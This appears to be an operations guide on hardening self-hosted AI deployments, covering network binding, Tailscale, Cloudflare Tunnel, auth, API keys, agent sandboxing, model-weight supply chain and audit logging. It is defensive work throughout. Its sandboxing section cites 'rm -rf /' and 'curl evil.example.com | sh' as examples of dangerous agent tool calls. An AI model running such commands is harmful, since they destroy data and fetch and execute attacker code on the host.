System guide · Operations

Securing a local-AI deployment

Network exposure, reverse proxies, Tailscale + Cloudflare Tunnel, auth layers, API-key management, sandboxing for agent code execution, supply-chain risks for model weights, audit logging, and the threat model that matters for homelab and team deployments.

By Fredoline Eruo · Reviewed 2026-05-07 · ~2,200 words

Why local-AI security is its own threat model

Cloud LLM threat models are well-developed: rate limiting, abuse detection, prompt-injection defense at the platform level, audit retention by the vendor. None of that comes free with a self-hosted deployment. The default Ollama install accepts requests from anyone who can reach port 11434. Open WebUI in default mode allows signups. vLLM has no auth at all.

That's not a bug — those tools target operators who'll add the auth layer themselves. But the operator who skips it is one network misconfiguration away from public exposure.

The threat models that actually matter

Three threat profiles, in increasing order of seriousness:

Solo homelab. Threat: someone on your LAN reaches your AI services. Mitigation: bind to loopback, expose only via Tailscale. Time investment: 10 minutes.
Small team / household. Threat: an accidentally-exposed port; a compromised browser session; a curious household member. Mitigation: auth on Open WebUI, SSO if available, Tailscale or VPN, per-user keys for the API gateway. Time: 1-2 hours.
Multi-tenant production. Threat: the full OWASP LLM Top 10. Compromised model weights, prompt injection from RAG documents, data exfiltration via tool calls, audit-log tampering. Mitigation: every layer below, plus SSO + RBAC + audit retention + supply-chain pinning. Time: weeks of integration.

Network exposure: bind localhost, expose Caddy

The single highest-leverage security action: bind every inference / database / dashboard service to 127.0.0.1 and expose only the reverse proxy on the network interface. vLLM, Ollama, Qdrant, Prometheus, Grafana — all default to binding 0.0.0.0 in their Docker compose templates. Override that explicitly.

On a typical homelab Docker compose: bind ports as 127.0.0.1:8000:8000 not 8000:8000. The colon-prefix changes the bind interface.

Tailscale workflow: the homelab default

Tailscale (or any WireGuard-based mesh) is the right answer for homelab and small-team remote access. It avoids exposing 443 publicly; uses identity-based auth (Google / GitHub / Microsoft); has MagicDNS for human-readable hostnames; works from any device.

The configuration: install Tailscale on the workstation, log in. On client devices, log into the same tailnet. The workstation is now reachable via workstation.tail-net.ts.net. Bind Caddy to the tailnet interface; reach Caddy from any tailnet device.

Tailscale's free tier covers 100 devices and unlimited bandwidth at solo speeds — enough for everything in /workflows/local-coding-agent-system and /workflows/private-chatgpt-replacement.

Cloudflare Tunnel + Access: the browser-only path

Cloudflare Tunnel is the alternative when (a) you need plain-browser access without installing a client, (b) you don't want to expose ports at all (the tunnel is outbound-only), or (c) you want Cloudflare Access SSO in front of the service.

The pattern: cloudflared runs on the workstation, opens an outbound tunnel to Cloudflare. Public DNS points ai.example.com at the tunnel. Cloudflare Access gates entry on Google / GitHub / email-based SSO. Browser users hit the public hostname; auth is handled at Cloudflare's edge.

Use this for Open WebUI when household / small-team members don't want a Tailscale client on every device. Don't use it for the inference engine itself.

Reverse proxy + TLS: Caddy / Traefik / nginx

Caddy is the right default for solo / homelab — auto-Let's-Encrypt, sensible HTTP/2 + HTTP/3 defaults, single-line Caddyfile per service. Traefik wins when you have many Docker services with auto-discovery; nginx wins when you already operate it elsewhere.

TLS is non-negotiable. Self-signed is fine for tailnet-only deployments (browsers complain but encryption is encryption); Let's Encrypt is free and works with Cloudflare DNS-01 challenges even when the service isn't publicly reachable.

Auth layers: from solo password to SSO

The auth ladder, in order of operational maturity:

Solo password on Open WebUI. Disable signup; set a strong owner password. Floor for solo deployments.
Caddy basic-auth in front of services that have no auth (Prometheus, Grafana). Floor for small-team.
Open WebUI multi-user with admin-managed accounts. SQLite backing for < 20 users; Postgres above.
Authelia / Authentik as SSO provider for multiple services. OIDC or SAML to corporate identity provider. Production tier.
Per-app virtual keys via LiteLLM. The right primitive for a homelab API gateway — see /workflows/homelab-ai-api.

API-key management: virtual keys + per-key budgets

The mistake of running a single API key across multiple personal projects: one runaway script consumes the entire budget; you have no per-script attribution. LiteLLM's virtual-key feature solves this — issue a per-script key with model whitelist + monthly budget + RPM cap.

Production tier adds key rotation policies (90 days), automated revocation on user offboarding, and audit-log integration for compliance.

Sandboxing for agent code execution

Agent loops that execute code (OpenHands, Aider with shell tools, custom agents) have a higher risk profile than chat. The agent is non-deterministic; one bad tool call can run rm -rf / or curl evil.example.com | sh.

Sandbox the execution environment. Specifically:

Rootless Docker containers for tool execution. The agent's Docker daemon runs as a non-root user; even a privileged-container escape lands in user-space.
Network isolation: --network=none for tasks that don't need network, named-network for those that do.
Read-only mounts for code under review. The agent can run tests; it cannot mutate the source tree without explicit approval.
Resource limits: CPU / memory caps prevent the agent's runaway-loop from killing the workstation.
No host secrets mounted into the sandbox. AWS / GCP credentials, GitHub tokens, SSH keys — none of these belong in the agent's environment.

OpenHands does most of this by default; verify your agent framework's defaults rather than assuming.

Supply-chain risks: model weights, datasets, embeddings

Open-weight models are downloaded from Hugging Face / GitHub / model authors' hosting. The supply-chain risk: a malicious uploader could ship weights with embedded prompt-injection ("when asked X, output Y") or a poisoned tokenizer. The mitigations:

Pin SHAs. Don't pull llama-3.1-8b-instruct:latest; pull the commit SHA. Hugging Face supports this.
Verify checksums against published values when offered.
Trust the publisher. Meta's, Mistral's, Qwen's, DeepSeek's official repos are well-watched. Random forks are not.
Embedding-model integrity especially matters — an embedding model swap silently changes every vector in your DB.

For private fine-tunes: treat the resulting weights as confidential as the source data. Anyone with checkpoint access can extract approximate training samples.

Audit logging: who saw what, when, why

Audit logs distinguish a serious deployment from a homelab toy. The minimum production audit set:

Authentication events (login, logout, failed attempts).
Per-call request metadata: timestamp, user, model, token count. Body is optional but high-value when storage allows.
Configuration changes (admin actions in Open WebUI / LiteLLM admin).
Tool-call events for agent loops (which tool, what arguments, what result).

Retention: 90 days for typical solo / small-team; 365+ days for regulated industries. Loki is the practical store; pipe to S3 / MinIO for long-term archive.

What ChatGPT-clones get wrong by default

The friction-free Open WebUI install is a beautiful UX and a default-insecure deployment. The specific defaults to override on day one:

WEBUI_AUTH=true — keep auth on. The "no auth" mode is for testing.
ENABLE_SIGNUP=false after the owner account exists.
WEBUI_SECRET_KEY set to a strong random value (not the example).
HTTPS enforced via Caddy. Open WebUI doesn't auto-redirect HTTP → HTTPS.
Don't expose 8080 directly. Always behind a reverse proxy.

Backup as a security concern

Backup is half maintenance, half security. The security half: an attacker who deletes your conversation history + vector DB + Open WebUI volume has destroyed your knowledge base. Encrypt backups at rest (age, gpg, or restic with a strong key). Store off-site. Test restores quarterly.

Incident response when things go wrong

For solo homelab: if you suspect compromise, take the workstation off the network, snapshot the state, then rebuild from known-good backups + freshly-pulled images. Don't try to forensicate a homelab; it's not worth the time.

For production: standard incident response — isolate, preserve, investigate, remediate, retrospect. The OWASP LLM Top 10 is the right reading list. Pre-write a runbook for "agent leaked secrets via tool call" and "user prompt-injection extracted RAG document" — these are the local-AI-specific incidents that catch teams unprepared.

Adjacent: maintenance covers the long-tail operational discipline; observability covers the dashboards and alerts that let you notice trouble.